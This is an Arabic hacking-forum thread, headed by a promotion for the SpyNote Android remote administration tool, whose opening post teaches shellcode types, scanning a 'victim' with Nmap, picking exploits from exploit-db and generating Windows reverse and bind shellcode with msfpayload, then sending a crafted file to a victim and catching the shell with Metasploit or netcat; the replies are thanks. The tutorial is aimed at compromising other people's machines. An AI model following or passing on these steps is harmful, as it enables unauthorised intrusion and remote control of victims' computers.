1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

الموضوع في 'أختبار الأختراق - Penetration Testing' بواسطة ALQAYSAR, بتاريخ ‏11 ديسمبر 2011.

كاتب الموضوع : ALQAYSAR المشاهدات : 10,449 الردود : 21 ‏11 ديسمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    ALQAYSAR
    rank
    Developer

    عضو منذ:
    ‏11 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    كيفكم اخواني انشاء الله اموركم طيبة ونصركم الله على مافيه خير .؟!

    باذن الله لو تقرا الموضوع كامل وتفهمة راح تفهك s h e l l code وكل شي عنه

    وايضا معرفة البحث عن البرامج المركبة وانواع ثغراتها وكتابة s h e l lcode

    خاص فيك , والشرح على windows و backtrack4

    اليوم معنا موضوع انشاء الله الجميع يستفيد منة :


    1- تعريف s h e l lcode ؟

    2- فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج

    4- ثغرات Remote Buffer OverFlow

    5- ثغرات Local Buffer OverFlow

    6- كتابة s h e l l code خاص فينا ؟

    [​IMG]

    في البادية يجي للذهن ماهو sh e l l code ؟

    هو عبارة عن رموز تستطيع خلق اتصال بينك وبين الضحية وتعطيك الصلاحية بالتحكم

    بالضحية ويتخلف من بيئة لاخرى ( يعني بيئة اللينكس والوندوز ... الـخ ) والشرح راح يكون على النظامينqalpp

    ايضا يعرف بكود برمجي صغير يستخدم كبايلود في الثغرات البرمجيه

    طيب كيف تعرفة لمن تفتح الثغرة بكل بساطة في كلمات داله علية بالثغرة

    مثل :

    s h e l l code ,my $s h e l lc o d e زي كذا

    [​IMG]

    [​IMG]

    طيب ياترى ماهي انواع s h e l l code

    1- local s h e l l code

    عبارة s h e l l code محلي يستخدم من قبل المهاجم وتكون صلاحيتة محدودة

    ولكن (يحول صلاحيتة بثغرات البرامج لصلاحية روت انت تم التشغيل بشكل صحيح )


    -remote s h e l l code

    يستخدم من قبل المهاجم حيث يستغل اي نقطة ضعف في الـ process التي تكون الضحية

    او اي جهاز معن في الشبكة خارجها في الانترنت

    اذا نجح الاتصال بهذا s h e l l code في العادة يستخدم TCP/IP socket

    طيب الي متعود يعمل s h e l l code خلال المشروع للميتاسبلويت تلاقي مثلا binds h e l l

    ويش معنات هذا هذي لو انت تبي تسوي اتصال بينك وبين الضحية ياحلـو

    وهنا تكمن التسمية bind اي خلال البورت



    3- Download and execute s h e l l code

    معروف ومشهور والاغلب يسمع فيه يجيك واحد يقول حصري على منتدنا اختراق

    اختراق بالميتاسبلويت وارفع باتش بيفروست !

    يعني المقصود حبايبي يعني تحميل وتشغيل s h e l l code هذا بابسط صورة

    4- Staged

    هذا يقول لك لمن يسوي install يعني يسوي لود للبانات فتوصل لاقصى حد لها

    هنا بالامكان حقن الـ porocess , ومن ثم الاستغلال لصالحك

    5- Egg-hunt s h e l l code

    وهذا يبحث عن عنوان العمليات وله مساحة وحجم اقل من s h e l l code

    6-Omelet s h e l l code

    يستخدم لحقن عنوان صغير جدا داخل احد العمليات process


    [​IMG]

    ثغرات Remote Buffer OverFlow :


    الاختراق عن طريق احد البرامج المصابة المركبة عند الضحية او في سيرفر معين ,

    ويتم الاختراق عن طريق ip مباشرة انما هنالك شروط لهذه الثغرة

    وهنا تكمن خطورة الثغرة لذلك لابد من توفر شروط


    1- توفر وجود البرنامج عند الضحية او السيرفر وتوافق الاصدار او لاترقع الثغرة

    2- عمل s h e l l c ode المناسب

    3- بعضها تحتاج لمفسر الباثيون , البيرل , الروبي لابد من توفرها .


    على سبيل المثـال :

    كود PHP:
    http://www.exploit-db.com/exploits/16101/ 
    [​IMG]

    طريقة الاستخدام بالشكل التـالي :

    [​IMG]

    ثغرات Local Buffer OverFlow :

    ثغرات ومن الاسم تعرف انها محلية يعني , تخترق بصيغة البرنامج المصاب مثل لو عندي

    ثغرة لبرنامج الريل بلاير ؟ اترجم الثغرة واجهز شيل كود صحيح تنشى لي ملف

    بنفس صيغة البرنامج المصاب كل الي عليك ترسلة للضحيـة

    على سبيل المثـال :

    كود PHP:
    http://www.exploit-db.com/exploits/16072/
    [​IMG]

    طريقة الاستخدام بالشكل التـالي :

    [​IMG]

    طيب بعد الانتهاء من انشاء s h e l l code وهذا ماسوف نتطرق اليه في اخر خطوة بالامكان التنصت

    بالميتاسبلويت بعد ارسال الملف او النت كات كما يوضح امامكم

    [​IMG]

    تنوية مهـم جـدا :

    الثغرات زي متلاحظون مكتوبة بالبيرل , الروبي الباثيون , السي طيب بالنسبة لمستخدمي الوندوز

    وللمعلومية جميعها للغات برمجية



    راح اعطيهم الراوبط للمفسرات في نهاية الموضوع وكيف تعرف انها باي لغة مكتوبة زي ماشرحنا على

    الصور وراح نكرر العملــية عشان الموضوع مفهوم من مجاميعة

    كود PHP:
    #!/user/bin/ruby     للغة الروبي  
    كود PHP:
    #!/user/bin/python      للغة الباثيون  
    كود PHP:
    #!/user/bin/perl  للغة البيرل
    كود PHP:
    #!/user/bin/php  للغة البي اتش بي
    كود PHP:
    #include<iostream.h>   هذه للغة السي ++
    طيب بالنسبة للـينكس مثلا الـ Backtrack 4

    ماتجتاج زي ماهو موضح امامكم


    افتح مستند وانسخ الثغرة :


    [​IMG]

    [​IMG]

    [​IMG]


    [​IMG]

    فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج :
    [​IMG]

    احنا راح نتطرق للفحص بـ Nmap فقط ولكن تقدر تفحص بالميتاسبلويت وnikto2

    او اي اداة موجود في Backtrack 4 مليان ادوات فحص

    الـ Nmap :

    اداة معروفة ومشهورة وجدي يعرفها للفحص السيرفر والايبي ادرس والشبكات

    ومعرفة البرامج المركبة وخدماتها والمنافذ (البورتات المفتوحة ) وهي موجودة في

    Backtack 4 وملستخدمي الوندوز هذا الرابط الرسمـي للموقع

    كود PHP:
    nmap.org/
    كود PHP:
     nmap -sV IP victim or server  الضحية او السيرفر المراد فحصة [php]
          
          [
    IMG]http://im.gulfup.com/2011-02-26/1298693808641.png[/IMG]
          
        
    [/B][B]الان كيف تبحث عن ثغرات البرامج :
     
     
    في البداية  نذهب لهـذا الموقع 
          
        
    [/B][PHP]http://www.exploit-db.com
    [​IMG]

    [​IMG]

    [​IMG]

    الان انشـاء *****code خاص فينا ؟ بالمناسبة هنا تصير مشاكل كثير :


    يعني واحد مايدري انواع s h e l l code واي واحد مناسب له ؟ مع انه الثغرة هي

    التي تقيدك بـ s h e l l code المناسب على سبيل المثال هذه الثغرة :

    كود PHP:
    http://www.exploit-db.com/exploits/5563/
    [​IMG]

    طيب زي ماهو موضح عندك محدد نوع *****code في الثغرة والي لازم انك تعمل لك

    واحد خاص فيك ؟ وانت تروح تفرفر وتتفلسف وتقول اسوي *****code metepreter

    كود PHP:
    my $*****code 
    # windows/s h e l l_bind_tcp - 500 bytes 
    # http://www.metasploit.com 
    # EXITFUNC=seh, LPORT=4444
    طيب مثلا انا لو اريد اعمل s h e l l code

    كود PHP:
    windows/s h e l l /reverse_tcp
    طيب اولا التطبيق على windows وبعدها على backtrack 4

    [​IMG]

    [​IMG]

    [​IMG]

    وانتهى ولان ننسخة في الثغرة تبعنا


    طيب بالنسبة للـ Backtrack4

    كود PHP:
    cd /opt/metasploit3/msf3/
    كود PHP:
    msfpayload windows/*****/reverse_tcp LHOSTIP LPORT PORT
    [​IMG]

    [​IMG]

    لحمد لله انتهى والان نعطيكم برامج مترجمات الثغرات على الوندوز من المواقع الرسمية :

    اذا الموضوع يستاهل نريد تقيمكم والي الموضوع مايعجبة يرد عادي ويقول راية

    اتمنى ان الموضوع واضح وبسيط يالله اشوفكم على خير ســلام

    [​IMG]


     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Dr.MOT Support
    إدارة الموقع

    عضو منذ:
    ‏2 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5,587
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    السلام عليكم ورحمة الله وبركاته

    بسم الله ماشاء الله موضوع في قمة الأحتراف

    مفيد للمبتدء والمحترف نفس الوقت

    أقولك ربي يزيد من علمك ويخليك لوالديك

    تم تعديل الموضوع لأن كلمة s h e l l

    مشفره بالمنتدى لازم تضع فراغات بين الحروف حتى لاتضهر مشفره

    + يثبت الموضوع لفتره

    أحلى فايف ستار

    بالتوفيق لك

    )5:"
     


  3. غير متصل

    ALZeaM
    rank
    Developer

    عضو منذ:
    ‏26 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    موضوع قيم ومفيد
    اشكرك من اعماق قلبي
    نشاط ملحوظ
    ^:"
     


  4. غير متصل

    معقد الحكومه
    rank
    Developer

    عضو منذ:
    ‏10 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    ما شاء الله عليك ، مبدع دائما
    )5:"
     


  5. غير متصل

    Microsoft
    V • I • P

    عضو منذ:
    ‏26 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    يعطيك العآفيه ، أخوي . تنسيق رأئع .
    وموضوع رائع من عضو روعه .
    تقبل مرؤري . جآري أن أمكنُ .
     


  6. غير متصل

    ряоfеѕѕіопаL
    V • I • P

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    ..يعطيك العافيه ..
    ..لاهنت ..
    )5:"
     


  7. غير متصل

    ᾘѳŚŚᾲḾ
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    HackeR
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    يعطيك العافيه حبيبي

    واصل ولا تحرمنا

    )5:")5:"
    )5:"
     


  8. غير متصل

    A7trt
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    يسـلمووووو ع الشـرح

    ـآبدآآآآع × ـآبدآآآع

    ووآآآآآصـل بلـآ فـوآصـل
     


  9. غير متصل

    G.e.r.n.a.s
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مبرمج
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    تسلم ايدك علي الشرح الرائع
     


  10. غير متصل

    شاجع
    rank
    Developer

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تعريف s h e l l code + انشاء شل خاص فيك + واختراق البرامج المركبة

    يعطيك الف عافيه​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...